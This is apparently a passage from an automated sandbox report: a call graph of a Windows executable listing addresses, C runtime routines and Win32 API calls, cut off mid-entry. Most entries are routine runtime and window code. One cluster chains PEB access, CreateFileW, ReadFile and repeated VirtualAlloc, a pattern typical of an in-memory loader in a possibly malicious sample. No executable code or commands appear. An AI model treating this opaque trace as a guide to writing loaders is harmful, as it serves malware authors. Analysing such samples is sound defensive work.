105178->105179 105180 9b7ed6 105179->105180 105182 9a8db6 _fprintf 9 API calls 105180->105182 105183 9b7fa5 105181->105183 105190 9b7f83 105181->105190 105184 9b7ee0 105182->105184 105185 9a8af4 __wsopen_nolock 58 API calls 105183->105185 105184->105164 105186 9b7faa 105185->105186 105187 9a8b28 _fprintf 58 API calls 105186->105187 105188 9b7fb7 105187->105188 105189 9a8db6 _fprintf 9 API calls 105188->105189 105189->105170 105191 9ad294 __alloc_osfhnd 61 API calls 105190->105191 105192 9b8051 105191->105192 105193 9b805b 105192->105193 105194 9b807e 105192->105194 105196 9a8af4 __wsopen_nolock 58 API calls 105193->105196 105195 9b7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105194->105195 105206 9b80a0 105195->105206 105197 9b8060 105196->105197 105199 9a8b28 _fprintf 58 API calls 105197->105199 105198 9b811e GetFileType 105200 9b816b 105198->105200 105201 9b8129 GetLastError 105198->105201 105203 9b806a 105199->105203 105213 9ad52a __set_osfhnd 59 API calls 105200->105213 105205 9a8b07 __dosmaperr 58 API calls 105201->105205 105202 9b80ec GetLastError 105207 9a8b07 __dosmaperr 58 API calls 105202->105207 105204 9a8b28 _fprintf 58 API calls 105203->105204 105204->105184 105208 9b8150 CloseHandle 105205->105208 105206->105198 105206->105202 105209 9b7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105206->105209 105210 9b8111 105207->105210 105208->105210 105211 9b815e 105208->105211 105212 9b80e1 105209->105212 105215 9a8b28 _fprintf 58 API calls 105210->105215 105214 9a8b28 _fprintf 58 API calls 105211->105214 105212->105198 105212->105202 105218 9b8189 105213->105218 105216 9b8163 105214->105216 105215->105170 105216->105210 105217 9b8344 105217->105170 105220 9b8517 CloseHandle 105217->105220 105218->105217 105219 9b18c1 __lseeki64_nolock 60 API calls 105218->105219 105237 9b820a 105218->105237 105221 9b81f3 105219->105221 105222 9b7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105220->105222 105224 9a8af4 __wsopen_nolock 58 API calls 105221->105224 105221->105237 105223 9b853e 105222->105223 105226 9b8572 105223->105226 105227 9b8546 GetLastError 105223->105227 105224->105237 105225 9b0e5b 70 API calls __read_nolock 105225->105237 105226->105170 105228 9a8b07 __dosmaperr 58 API calls 105227->105228 105229 9b8552 105228->105229 105233 9ad43d __free_osfhnd 59 API calls 105229->105233 105230 9b0add __close_nolock 61 API calls 105230->105237 105231 9b823c 105232 9b97a2 __chsize_nolock 82 API calls 105231->105232 105231->105237 105232->105231 105233->105226 105234 9ad886 __write 78 API calls 105234->105237 105235 9b83c1 105236 9b0add __close_nolock 61 API calls 105235->105236 105238 9b83c8 105236->105238 105237->105217 105237->105225 105237->105230 105237->105231 105237->105234 105237->105235 105239 9b18c1 60 API calls __lseeki64_nolock 105237->105239 105240 9a8b28 _fprintf 58 API calls 105238->105240 105239->105237 105240->105170 105241->105161 105242->105166 105243->105166 105245 984b83 105244->105245 105246 984c3f LoadLibraryA 105244->105246 105245->105046 105245->105047 105246->105245 105247 984c50 GetProcAddress 105246->105247 105247->105245 105249 984ea3 FindResourceExW 105248->105249 105253 984ec0 105248->105253 105250 9bd933 LoadResource 105249->105250 105249->105253 105251 9bd948 SizeofResource 105250->105251 105250->105253 105252 9bd95c LockResource 105251->105252 105251->105253 105252->105253 105253->105055 105255 9bd9ab 105254->105255 105256 984ef4 105254->105256 105260 9a584d 105256->105260 105258 984f02 105258->105066 105259->105055 105261 9a5859 _fprintf 105260->105261 105262 9a586b 105261->105262 105263 9a5891 105261->105263 105273 9a8b28 58 API calls __getptd_noexit 105262->105273 105275 9a6c11 105263->105275 105266 9a5870 105274 9a8db6 9 API calls _fprintf 105266->105274 105270 9a58a6 105282 9a58c8 LeaveCriticalSection LeaveCriticalSection _fprintf 105270->105282 105272 9a587b _fprintf 105272->105258 105273->105266 105274->105272 105276 9a6c43 EnterCriticalSection 105275->105276 105277 9a6c21 105275->105277 105278 9a5897 105276->105278 105277->105276 105279 9a6c29 105277->105279 105281 9a57be 83 API calls 4 library calls 105278->105281 105280 9a9c0b __lock 58 API calls 105279->105280 105280->105278 105281->105270 105282->105272 105286 9a55fd 105283->105286 105285 984f2e 105285->105074 105287 9a5609 _fprintf 105286->105287 105288 9a564c 105287->105288 105289 9a5644 _fprintf 105287->105289 105292 9a561f _memset 105287->105292 105290 9a6c11 __lock_file 59 API calls 105288->105290 105289->105285 105291 9a5652 105290->105291 105299 9a541d 105291->105299 105313 9a8b28 58 API calls __getptd_noexit 105292->105313 105294 9a5639 105314 9a8db6 9 API calls _fprintf 105294->105314 105301 9a5438 _memset 105299->105301 105306 9a5453 105299->105306 105300 9a5443 105411 9a8b28 58 API calls __getptd_noexit 105300->105411 105301->105300 105301->105306 105310 9a5493 105301->105310 105303 9a5448 105412 9a8db6 9 API calls _fprintf 105303->105412 105315 9a5686 LeaveCriticalSection LeaveCriticalSection _fprintf 105306->105315 105307 9a55a4 _memset 105414 9a8b28 58 API calls __getptd_noexit 105307->105414 105310->105306 105310->105307 105316 9a46e6 105310->105316 105323 9b0e5b 105310->105323 105391 9b0ba7 105310->105391 105413 9b0cc8 58 API calls 3 library calls 105310->105413 105313->105294 105314->105289 105315->105289 105317 9a46f0 105316->105317 105318 9a4705 105316->105318 105415 9a8b28 58 API calls __getptd_noexit 105317->105415 105318->105310 105320 9a46f5 105416 9a8db6 9 API calls _fprintf 105320->105416 105322 9a4700 105322->105310 105324 9b0e7c 105323->105324 105325 9b0e93 105323->105325 105426 9a8af4 58 API calls __getptd_noexit 105324->105426 105327 9b15cb 105325->105327 105331 9b0ecd 105325->105331 105442 9a8af4 58 API calls __getptd_noexit 105327->105442 105328 9b0e81 105427 9a8b28 58 API calls __getptd_noexit 105328->105427 105333 9b0ed5 105331->105333 105340 9b0eec 105331->105340 105332 9b15d0 105443 9a8b28 58 API calls __getptd_noexit 105332->105443 105428 9a8af4 58 API calls __getptd_noexit 105333->105428 105335 9b0e88 105335->105310 105337 9b0ee1 105444 9a8db6 9 API calls _fprintf 105337->105444 105338 9b0eda 105429 9a8b28 58 API calls __getptd_noexit 105338->105429 105340->105335 105341 9b0f01 105340->105341 105343 9b0f1b 105340->105343 105345 9b0f39 105340->105345 105430 9a8af4 58 API calls __getptd_noexit 105341->105430 105343->105341 105359 9b0f26 105343->105359 105431 9a881d 58 API calls 2 library calls 105345->105431 105348 9b0f49 105349 9b0f6c 105348->105349 105350 9b0f51 105348->105350 105434 9b18c1 60 API calls 3 library calls 105349->105434 105432 9a8b28 58 API calls __getptd_noexit 105350->105432 105351 9b103a 105353 9b10b3 ReadFile 105351->105353 105358 9b1050 GetConsoleMode 105351->105358 105356 9b1593 GetLastError 105353->105356 105357 9b10d5 105353->105357 105355 9b0f56 105433 9a8af4 58 API calls __getptd_noexit 105355->105433 105361 9b15a0 105356->105361 105362 9b1093 105356->105362 105357->105356 105366 9b10a5 105357->105366 105363 9b10b0 105358->105363 105364 9b1064 105358->105364 105417 9b5c6b 105359->105417 105440 9a8b28 58 API calls __getptd_noexit 105361->105440 105373 9b1099 105362->105373 105435 9a8b07 58 API calls 3 library calls 105362->105435 105363->105353 105364->105363 105367 9b106a ReadConsoleW 105364->105367 105366->105373 105374 9b110a 105366->105374 105383 9b1377 105366->105383 105367->105366 105369 9b108d GetLastError 105367->105369 105368 9b15a5 105441 9a8af4 58 API calls __getptd_noexit 105368->105441 105369->105362 105372 9a2d55 _free 58 API calls 105372->105335 105373->105335 105373->105372 105375 9b1176 ReadFile 105374->105375 105381 9b11f7 105374->105381 105377 9b1197 GetLastError 105375->105377 105390 9b11a1 105375->105390 105377->105390 105378 9b12b4 105385 9b1264 MultiByteToWideChar 105378->105385 105438 9b18c1 60 API calls 3 library calls 105378->105438 105379 9b12a4 105437 9a8b28 58 API calls __getptd_noexit 105379->105437 105380 9b147d ReadFile 105384 9b14a0 GetLastError 105380->105384 105388 9b14ae 105380->105388 105381->105373 105381->105378 105381->105379 105381->105385 105383->105373 105383->105380 105384->105388 105385->105369 105385->105373 105388->105383 105439 9b18c1 60 API calls 3 library calls 105388->105439 105390->105374 105436 9b18c1 60 API calls 3 library calls 105390->105436 105392 9b0bb2 105391->105392 105396 9b0bc7 105391->105396 105478 9a8b28 58 API calls __getptd_noexit 105392->105478 105394 9b0bb7 105479 9a8db6 9 API calls _fprintf 105394->105479 105397 9b0bfc 105396->105397 105403 9b0bc2 105396->105403 105480 9b5fe4 58 API calls __malloc_crt 105396->105480 105399 9a46e6 _fprintf 58 API calls 105397->105399 105400 9b0c10 105399->105400 105445 9b0d47 105400->105445 105402 9b0c17 105402->105403 105404 9a46e6 _fprintf 58 API calls 105402->105404 105403->105310 105405 9b0c3a 105404->105405 105405->105403 105406 9a46e6 _fprintf 58 API calls 105405->105406 105407 9b0c46 105406->105407 105407->105403 105408 9a46e6 _fprintf 58 API calls 105407->105408 105409 9b0c53 105408->105409 105410 9a46e6 _fprintf 58 API calls 105409->105410 105410->105403 105411->105303 105412->105306 105413->105310 105414->105303 105415->105320 105416->105322 105418 9b5c83 105417->105418 105419 9b5c76 105417->105419 105422 9b5c8f 105418->105422 105423 9a8b28 _fprintf 58 API calls 105418->105423 105420 9a8b28 _fprintf 58 API calls 105419->105420 105421 9b5c7b 105420->105421 105421->105351 105422->105351 105424 9b5cb0 105423->105424 105425 9a8db6 _fprintf 9 API calls 105424->105425 105425->105421 105426->105328 105427->105335 105428->105338 105429->105337 105430->105338 105431->105348 105432->105355 105433->105335 105434->105359 105435->105373 105436->105390 105437->105373 105438->105385 105439->105388 105440->105368 105441->105373 105442->105332 105443->105337 105444->105335 105446 9b0d53 _fprintf 105445->105446 105447 9b0d60 105446->105447 105448 9b0d77 105446->105448 105449 9a8af4 __wsopen_nolock 58 API calls 105447->105449 105450 9b0e3b 105448->105450 105453 9b0d8b 105448->105453 105452 9b0d65 105449->105452 105451 9a8af4 __wsopen_nolock 58 API calls 105450->105451 105454 9b0dae 105451->105454 105455 9a8b28 _fprintf 58 API calls 105452->105455 105456 9b0da9 105453->105456 105457 9b0db6 105453->105457 105463 9a8b28 _fprintf 58 API calls 105454->105463 105470 9b0d6c _fprintf 105455->105470 105460 9a8af4 __wsopen_nolock 58 API calls 105456->105460 105458 9b0dd8 105457->105458 105459 9b0dc3 105457->105459 105462 9ad206 ___lock_fhandle 59 API calls 105458->105462 105461 9a8af4 __wsopen_nolock 58 API calls 105459->105461 105460->105454 105464 9b0dc8 105461->105464 105465 9b0dde 105462->105465 105466 9b0dd0 105463->105466 105467 9a8b28 _fprintf 58 API calls 105464->105467 105468 9b0df1 105465->105468 105469 9b0e04 105465->105469 105472 9a8db6 _fprintf 9 API calls 105466->105472 105467->105466 105471 9b0e5b __read_nolock 70 API calls 105468->105471 105473 9a8b28 _fprintf 58 API calls 105469->105473 105470->105402 105474 9b0dfd 105471->105474 105472->105470 105475 9b0e09 105473->105475 105477 9b0e33 __read LeaveCriticalSection 105474->105477 105476 9a8af4 __wsopen_nolock 58 API calls 105475->105476 105476->105474 105477->105470 105478->105394 105479->105403 105480->105397 105484 9a520a GetSystemTimeAsFileTime 105481->105484 105483 9e8f6e 105483->105076 105485 9a5238 __aulldiv 105484->105485 105485->105483 105487 9a5c6c _fprintf 105486->105487 105488 9a5c7e 105487->105488 105489 9a5c93 105487->105489 105500 9a8b28 58 API calls __getptd_noexit 105488->105500 105490 9a6c11 __lock_file 59 API calls 105489->105490 105493 9a5c99 105490->105493 105492 9a5c83 105501 9a8db6 9 API calls _fprintf 105492->105501 105502 9a58d0 67 API calls 5 library calls 105493->105502 105496 9a5ca4 105503 9a5cc4 LeaveCriticalSection LeaveCriticalSection _fprintf 105496->105503 105497 9a5c8e _fprintf 105497->105081 105499 9a5cb6 105499->105497 105500->105492 105501->105497 105502->105496 105503->105499 105504->104954 105505->104956 105506->105006 105508 9a486f _fprintf 105507->105508 105509 9a488d 105508->105509 105510 9a48a5 105508->105510 105513 9a489d _fprintf 105508->105513 105587 9a8b28 58 API calls __getptd_noexit 105509->105587 105511 9a6c11 __lock_file 59 API calls 105510->105511 105514 9a48ab 105511->105514 105513->105017 105515 9a4892 105521 9a53b2 _fprintf 105520->105521 105522 9a53c6 105521->105522 105523 9a53de 105521->105523 105749 9a8b28 58 API calls __getptd_noexit 105522->105749 105525 9a6c11 __lock_file 59 API calls 105523->105525 105529 9a53d6 _fprintf 105523->105529 105528 9a53f0 105525->105528 105538 9e9748 __tzset_nolock _wcscmp 105536->105538 105537 984f0b 74 API calls 105537->105538 105538->105537 105539 9e9109 GetSystemTimeAsFileTime 105538->105539 105540 9e9210 105538->105540 105541 984ee5 85 API calls 105538->105541 105539->105538 105540->104986 105542 9a40fb 58 API calls __wsplitpath_helper 105540->105542 105541->105538 105542->104989 105543->104997 105587->105515 105870 9d60e8 105869->105870 105871 9d60cb 105869->105871 105870->104388 105871->105870 105873 9d60ab 59 API calls Mailbox 105871->105873 105873->105871 105874 130295b 105877 13025d0 105874->105877 105876 13029a7 105878 1300000 GetPEB 105877->105878 105881 130266f 105878->105881 105880 13026a0 CreateFileW 105880->105881 105887 13026ad 105880->105887 105882 13026c9 VirtualAlloc 105881->105882 105881->105887 105888 13027d0 CloseHandle 105881->105888 105889 13027e0 VirtualFree 105881->105889 105890 13034e0 GetPEB 105881->105890 105883 13026ea ReadFile 105882->105883 105882->105887 105886 1302708 VirtualAlloc 105883->105886 105883->105887 105884 13028ca 105884->105876 105885 13028bc VirtualFree 105885->105884 105886->105881 105886->105887 105887->105884 105887->105885 105888->105881 105889->105881 105891 130350a 105890->105891 105891->105880 105892 983633 105893 98366a 105892->105893 105894 9836e5 105893->105894 105895 983688 105893->105895 105896 9836e7 105893->105896 105897 9836ca DefWindowProcW 105894->105897 105900 98374b PostQuitMessage 105895->105900 105901 983695 105895->105901 105898 9836ed 105896->105898 105899 9bd0cc 105896->105899 105904 9836d8 105897->105904 105905 9836f2 105898->105905 105906 983715 SetTimer RegisterWindowMessageW 105898->105906 105941 991070 10 API calls Mailbox 105899->105941 105900->105904 105902 9836a0 105901->105902 105903 9bd154 105901->105903 105909 9836a8 105902->105909 105910 983755 105902->105910 105957 9e2527 71 API calls _memset 105903->105957 105913 9836f9 KillTimer 105905->105913 105914 9bd06f 105905->105914 105906->105904 105911 98373e CreatePopupMenu 105906->105911 105908 9bd0f3 105942 991093 341 API calls Mailbox 105908->105942 105916 9bd139 105909->105916 105917 9836b3 105909->105917 105939 9844a0 64 API calls _memset 105910->105939 105911->105904 105937 98443a Shell_NotifyIconW _memset 105913->105937 105920 9bd0a8 MoveWindow 105914->105920 105921 9bd074 105914->105921 105916->105897 105956 9d7c36 59 API calls Mailbox 105916->105956 105923 9836be 105917->105923 105924 9bd124 105917->105924 105918 9bd166 105918->105897 105918->105904 105920->105904 105926 9bd078 105921->105926 105927 9bd097 SetFocus 105921->105927 105923->105897 105943 98443a Shell_NotifyIconW _memset 105923->105943 105955 9e2d36 81 API calls _memset 105924->105955 105925 983764 105925->105904 105926->105923 105929 9bd081 105926->105929 105927->105904 105928 98370c 105938 983114 DeleteObject DestroyWindow Mailbox 105928->105938 105940 991070 10 API calls Mailbox 105929->105940 105935 9bd118 105944 98434a 105935->105944 105937->105928 105938->105904 105939->105925 105940->105904 105941->105908 105942->105923 105943->105935 105945 984375 _memset 105944->105945 105958 984182 105945->105958 105948 9843fa 105950 984430 Shell_NotifyIconW 105948->105950 105951 984414 Shell_NotifyIconW 105948->105951 105952 984422 105950->105952 105951->105952 105962 98407c 105952->105962 105954 984429 105954->105894 105955->105925 105956->105894 105957->105918 105959 9bd423 105958->105959 105960 984196 105958->105960 105959->105960 105961 9bd42c DestroyIcon 105959->105961 105960->105948 105984 9e2f94 62 API calls _W_store_winword 105960->105984 105961->105960 105963 984098 105962->105963 105964 98416f Mailbox 105962->105964 105965 987a16 59 API calls 105963->105965 105964->105954 105966 9840a6 105965->105966 105967 9bd3c8 LoadStringW 105966->105967 105968 9840b3 105966->105968 105970 9bd3e2 105967->105970 105969 987bcc 59 API calls 105968->105969 105971 9840c8 105969->105971 105973 987b2e 59 API calls 105970->105973 105971->105970 105972 9840d9 105971->105972 105974 9840e3 105972->105974 105975 984174 105972->105975 105978 9bd3ec 105973->105978 105976 987b2e 59 API calls 105974->105976 105977 988047 59 API calls 105975->105977 105980 9840ed _memset _wcscpy 105976->105980 105977->105980 105979 987cab 59 API calls 105978->105979 105978->105980 105981 9bd40e 105979->105981 105982 984155 Shell_NotifyIconW 105980->105982 105983 987cab 59 API calls 105981->105983 105982->105964 105983->105980 105984->105948 105985 9a7c56 105986 9a7c62 _fprintf 105985->105986 106022 9a9e08 GetStartupInfoW 105986->106022 105989 9a7c67 106024 9a8b7c GetProcessHeap 105989->106024 105990 9a7cbf 105991 9a7cca 105990->105991 106107 9a7da6 58 API calls 3 library calls 105990->106107 106025 9a9ae6 105991->106025 105994 9a7cd0 105995 9a7cdb __RTC_Initialize 105994->105995 106108 9a7da6 58 API calls 3 library calls 105994->106108 106046 9ad5d2 105995->106046 105998 9a7cea 105999 9a7cf6 GetCommandLineW 105998->105999 106109 9a7da6 58 API calls 3 library calls 105998->106109 106065 9b4f23 GetEnvironmentStringsW 105999->106065 106002 9a7cf5 106002->105999 106005 9a7d10 106006 9a7d1b 106005->106006 106110 9a30b5 58 API calls 3 library calls 106005->106110 106075 9b4d58 106006->106075 106009 9a7d21 106010 9a7d2c 106009->106010 106111 9a30b5 58 API calls 3 library calls 106009->106111 106089 9a30ef 106010->106089 106013 9a7d34 106014 9a7d3f __wwincmdln 106013->106014 106112 9a30b5 58 API calls 3 library calls 106013->106112 106095 9847d0 106014->106095 106017 9a7d53 106018 9a7d62 106017->106018 106113 9a3358 58 API calls _doexit 106017->106113 106114 9a30e0 58 API calls _doexit 106018->106114 106021 9a7d67 _fprintf 106023 9a9e1e 106022->106023 106023->105989 106024->105990 106115 9a3187 36 API calls 2 library calls 106025->106115 106027 9a9aeb 106116 9a9d3c InitializeCriticalSectionAndSpinCount __alloc_osfhnd 106027->106116 106029 9a9af0 106030 9a9af4 106029->106030 106118 9a9d8a TlsAlloc 106029->106118 106117 9a9b5c 61 API calls 2 library calls 106030->106117 106033 9a9af9 106033->105994 106034 9a9b06 106034->106030 106035 9a9b11 106034->106035 106119 9a87d5 106035->106119 106038 9a9b53 106127 9a9b5c 61 API calls 2 library calls 106038->106127 106041 9a9b58 106041->105994 106042 9a9b32 106042->106038 106043 9a9b38 106042->106043 106126 9a9a33 58 API calls 4 library calls 106043->106126 106045 9a9b40 GetCurrentThreadId 106045->105994 106047 9ad5de _fprintf 106046->106047 106048 9a9c0b __lock 58 API calls 106047->106048 106049 9ad5e5 106048->106049 106050 9a87d5 __calloc_crt 58 API calls 106049->106050 106051 9ad5f6 106050->106051 106052 9ad661 GetStartupInfoW 106051->106052 106053 9ad601 @_EH4_CallFilterFunc@8 _fprintf 106051->106053 106059 9ad676 106052->106059 106062 9ad7a5 106052->106062 106053->105998 106054 9ad86d 106141 9ad87d LeaveCriticalSection _doexit 106054->106141 106056 9a87d5 __calloc_crt 58 API calls 106056->106059 106057 9ad7f2 GetStdHandle 106057->106062 106058 9ad805 GetFileType 106058->106062 106059->106056 106061 9ad6c4 106059->106061 106059->106062 106060 9ad6f8 GetFileType 106060->106061 106061->106060 106061->106062 106139 9a9e2b InitializeCriticalSectionAndSpinCount 106061->106139 106062->106054 106062->106057 106062->106058 106140 9a9e2b InitializeCriticalSectionAndSpinCount 106062->106140 106066 9a7d06 106065->106066 106067 9b4f34 106065->106067 106071 9b4b1b GetModuleFileNameW 106066->106071 106142 9a881d 58 API calls 2 library calls 106067->106142 106069 9b4f5a _memmove 106070 9b4f70 FreeEnvironmentStringsW 106069->106070 106070->106066 106072 9b4b4f _wparse_cmdline 106071->106072 106074 9b4b8f _wparse_cmdline 106072->106074 106143 9a881d 58 API calls 2 library calls 106072->106143 106074->106005 106076 9b4d71 __wsetenvp 106075->106076 106080 9b4d69 106075->106080 106077 9a87d5 __calloc_crt 58 API calls 106076->106077 106085 9b4d9a __wsetenvp 106077->106085 106078 9b4df1 106079 9a2d55 _free 58 API calls 106078->106079 106079->106080 106080->106009 106081 9a87d5 __calloc_crt 58 API calls 106081->106085 106082 9b4e16 106084 9a2d55 _free 58 API calls 106082->106084 106084->106080 106085->106078 106085->106080 106085->106081 106085->106082 106086 9b4e2d 106085->106086 106144 9b4607 58 API calls _fprintf 106085->106144 106145 9a8dc6 IsProcessorFeaturePresent 106086->106145 106088 9b4e39 106088->106009 106091 9a30fb __IsNonwritableInCurrentImage 106089->106091 106160 9aa4d1 106091->106160 106092 9a3119 __initterm_e 106093 9a2d40 __cinit 67 API calls 106092->106093 106094 9a3138 __cinit __IsNonwritableInCurrentImage 106092->106094 106093->106094 106094->106013 106096 9847ea 106095->106096 106106 984889 106095->106106 106097 984824 IsThemeActive 106096->106097 106163 9a336c 106097->106163 106101 984850 106175 9848fd SystemParametersInfoW SystemParametersInfoW 106101->106175 106103 98485c 106176 983b3a 106103->106176 106105 984864 SystemParametersInfoW 106105->106106 106106->106017 106107->105991 106108->105995 106109->106002 106113->106018 106114->106021 106115->106027 106116->106029 106117->106033 106118->106034 106121 9a87dc 106119->106121 106122 9a8817 106121->106122 106124 9a87fa 106121->106124 106128 9b51f6 106121->106128 106122->106038 106125 9a9de6 TlsSetValue 106122->106125 106124->106121 106124->106122 106136 9aa132 Sleep 106124->106136 106125->106042 106126->106045 106127->106041 106129 9b5201 106128->106129 106133 9b521c 106128->106133 106130 9b520d 106129->106130 106129->106133 106137 9a8b28 58 API calls __getptd_noexit 106130->106137 106132 9b522c HeapAlloc 106132->106133 106134 9b5212 106132->106134 106133->106132 106133->106134 106138 9a33a1 DecodePointer 106133->106138 106134->106121 106136->106124 106137->106134 106138->106133 106139->106061 106140->106062 106141->106053 106142->106069 106143->106074 106144->106085 106146 9a8dd1 106145->106146 106151 9a8c59 106146->106151 106150 9a8dec 106150->106088 106152 9a8c73 _memset ___raise_securityfailure 106151->106152 106153 9a8c93 IsDebuggerPresent 106152->106153 106159 9aa155 SetUnhandledExceptionFilter UnhandledExceptionFilter 106153->106159 106155 9ac5f6 __ld12tod 6 API calls 106157 9a8d7a 106155->106157 106156 9a8d57 ___raise_securityfailure 106156->106155 106158 9aa140 GetCurrentProcess TerminateProcess 106157->106158 106158->106150 106159->106156 106161 9aa4d4 EncodePointer 106160->106161 106161->106161 106162 9aa4ee 106161->106162 106162->106092 106164 9a9c0b __lock 58 API calls 106163->106164 106165 9a3377 DecodePointer EncodePointer 106164->106165 106228 9a9d75 LeaveCriticalSection 106165->106228 106167 984849 106168 9a33d4 106167->106168 106169 9a33f8 106168->106169 106170 9a33de 106168->106170 106169->106101 106170->106169 106229 9a8b28 58 API calls __getptd_noexit 106170->106229 106172 9a33e8 106230 9a8db6 9 API calls _fprintf 106172->106230 106174 9a33f3 106174->106101 106175->106103 106177 983b47 __write_nolock 106176->106177 106178 987667 59 API calls 106177->106178 106179 983b51 GetCurrentDirectoryW 106178->106179 106231 983766 106179->106231 106181 983b7a IsDebuggerPresent 106182 983b88 106181->106182 106183 9bd272 MessageBoxA 106181->106183 106184 983c61 106182->106184 106186 9bd28c 106182->106186 106187 983ba5 106182->106187 106183->106186 106185 983c68 SetCurrentDirectoryW 106184->106185 106188 983c75 Mailbox 106185->106188 106430 987213 59 API calls Mailbox 106186->106430 106312 987285 106187->106312 106188->106105 106193 9bd29c 106196 9bd2b2 SetCurrentDirectoryW 106193->106196 106196->106188 106228->106167 106229->106172 106230->106174 106232 987667 59 API calls 106231->106232 106233 98377c 106232->106233 106432 983d31 106233->106432 106235 98379a 106236 984706 61 API calls 106235->106236 106237 9837ae 106236->106237 106238 987de1 59 API calls 106237->106238 106239 9837bb 106238->106239 106240 984ddd 136 API calls 106239->106240 106241 9837d4 106240->106241 106242 9837dc Mailbox 106241->106242 106243 9bd173 106241->106243 106246 988047 59 API calls 106242->106246 106474 9e955b 106243->106474 106249 9837ef 106246->106249 106247 9bd192 106248 9a2d55 _free 58 API calls 106247->106248 106251 9bd19f 106248->106251 106446 98928a 106249->106446 106250 984e4a 84 API calls 106250->106247 106253 984e4a 84 API calls 106251->106253 106257 9bd1a8 106253->106257 106255 987de1 59 API calls 106256 983808 106255->106256 106258 9884c0 69 API calls 106256->106258 106259 983ed0 59 API calls 106257->106259 106260 98381a Mailbox 106258->106260 106261 9bd1c3 106259->106261 106262 987de1 59 API calls 106260->106262 106263 983ed0 59 API calls 106261->106263 106264 983840 106262->106264 106265 9bd1df 106263->106265 106266 9884c0 69 API calls 106264->106266 106267 984706 61 API calls 106265->106267 106269 98384f Mailbox 106266->106269 106268 9bd204 106267->106268 106270 983ed0 59 API calls 106268->106270 106272 987667 59 API calls 106269->106272 106271 9bd210 106270->106271 106273 988047 59 API calls 106271->106273 106274 98386d 106272->106274 106275 9bd21e 106273->106275 106449 983ed0 106274->106449 106277 983ed0 59 API calls 106275->106277 106279 9bd22d 106277->106279 106285 988047 59 API calls 106279->106285 106281 983887 106281->106257 106282 983891 106281->106282 106283 9a2efd _W_store_winword 60 API calls 106282->106283 106284 98389c 106283->106284 106284->106261 106286 9838a6 106284->106286 106287 9bd24f 106285->106287 106288 9a2efd _W_store_winword 60 API calls 106286->106288 106289 983ed0 59 API calls 106287->106289 106290 9838b1 106288->106290 106291 9bd25c 106289->106291 106290->106265 106292 9838bb 106290->106292 106291->106291 106293 9a2efd _W_store_winword 60 API calls 106292->106293 106294 9838c6 106293->106294 106294->106279 106295 983907 106294->106295 106297 983ed0 59 API calls 106294->106297 106295->106279 106296 983914 106295->106296 106299 9892ce 59 API calls 106296->106299 106298 9838ea 106297->106298 106300 988047 59 API calls 106298->106300 106301 983924 106299->106301 106302 9838f8 106300->106302 106303 989050 59 API calls 106301->106303 106304 983ed0 59 API calls 106302->106304 106305 983932 106303->106305 106304->106295 106465 988ee0 106305->106465 106307 98928a 59 API calls 106309 98394f 106307->106309 106308 988ee0 60 API calls 106308->106309 106309->106307 106309->106308 106310 983ed0 59 API calls 106309->106310 106311 983995 Mailbox 106309->106311 106310->106309 106311->106181 106313 987292 __write_nolock 106312->106313 106314 9872ab 106313->106314 106315 9bea22 _memset 106313->106315 106316 984750 60 API calls 106314->106316 106317 9bea3e GetOpenFileNameW 106315->106317 106318 9872b4 106316->106318 106319 9bea8d 106317->106319 106514 9a0791 106318->106514 106321 987bcc 59 API calls 106319->106321 106323 9beaa2 106321->106323 106323->106323 106430->106193 106433 983d3e __write_nolock 106432->106433 106434 987bcc 59 API calls 106433->106434 106444 983ea4 Mailbox 106433->106444 106436 983d70 106434->106436 106435 9879f2 59 API calls 106435->106436 106436->106435 106437 983da6 Mailbox 106436->106437 106438 983e77 106437->106438 106440 987de1 59 API calls 106437->106440 106443 983f74 59 API calls 106437->106443 106437->106444 106445 9879f2 59 API calls 106437->106445 106439 987de1 59 API calls 106438->106439 106438->106444 106441 983e98 106439->106441 106440->106437 106442 983f74 59 API calls 106441->106442 106442->106444 106443->106437 106444->106235 106445->106437 106447 9a0db6 Mailbox 59 API calls 106446->106447 106448 9837fb 106447->106448 106448->106255 106450 983eda 106449->106450 106451 983ef3 106449->106451 106453 988047 59 API calls 106450->106453 106452 987bcc 59 API calls 106451->106452 106454 983879 106452->106454 106453->106454 106455 9a2efd 106454->106455 106456 9a2f09 106455->106456 106457 9a2f7e 106455->106457 106463 9a2f2e 106456->106463 106509 9a8b28 58 API calls __getptd_noexit 106456->106509 106511 9a2f90 60 API calls 3 library calls 106457->106511 106460 9a2f8b 106460->106281 106461 9a2f15 106510 9a8db6 9 API calls _fprintf 106461->106510 106463->106281 106464 9a2f20 106464->106281 106466 9bf17c 106465->106466 106470 988ef7 106465->106470 106466->106470 106513 988bdb 59 API calls Mailbox 106466->106513 106468 988ff8 106471 9a0db6 Mailbox 59 API calls 106468->106471 106469 989040 106512 989d3c 60 API calls Mailbox 106469->106512 106470->106468 106470->106469 106473 988fff 106470->106473 106471->106473 106473->106309 106475 984ee5 85 API calls 106474->106475 106476 9e95ca 106475->106476 106477 9e9734 96 API calls 106476->106477 106478 9e95dc 106477->106478 106479 984f0b 74 API calls 106478->106479 106508 9bd186 106478->106508 106480 9e95f7 106479->106480 106481 984f0b 74 API calls 106480->106481 106482 9e9607 106481->106482 106483 984f0b 74 API calls 106482->106483 106484 9e9622 106483->106484 106485 984f0b 74 API calls 106484->106485 106486 9e963d 106485->106486 106487 984ee5 85 API calls 106486->106487 106488 9e9654 106487->106488 106489 9a571c __crtCompareStringA_stat 58 API calls 106488->106489 106490 9e965b 106489->106490 106491 9a571c __crtCompareStringA_stat 58 API calls 106490->106491 106492 9e9665 106491->106492 106493 984f0b 74 API calls 106492->106493 106494 9e9679 106493->106494 106495 9e9109 GetSystemTimeAsFileTime 106494->106495 106496 9e968c 106495->106496 106497 9e96b6 106496->106497 106498 9e96a1 106496->106498 106500 9e96bc 106497->106500 106501 9e971b 106497->106501 106499 9a2d55 _free 58 API calls 106498->106499 106502 9e96a7 106499->106502 106503 9e8b06 116 API calls 106500->106503 106504 9a2d55 _free 58 API calls 106501->106504 106505 9a2d55 _free 58 API calls 106502->106505 106506 9e9713 106503->106506 106504->106508 106505->106508 106507 9a2d55 _free 58 API calls 106506->106507 106507->106508 106508->106247 106508->106250 106509->106461 106510->106464 106511->106460 106512->106473 106513->106470 106515 9b1940 __write_nolock 106514->106515 106516 9a079e GetLongPathNameW 106515->106516 106790 981055 106795 982649 106790->106795 106793 9a2d40 __cinit 67 API calls 106794 981064 106793->106794 106796 987667 59 API calls 106795->106796 106797 9826b7 106796->106797 106802 983582 106797->106802 106800 982754 106801 98105a 106800->106801 106805 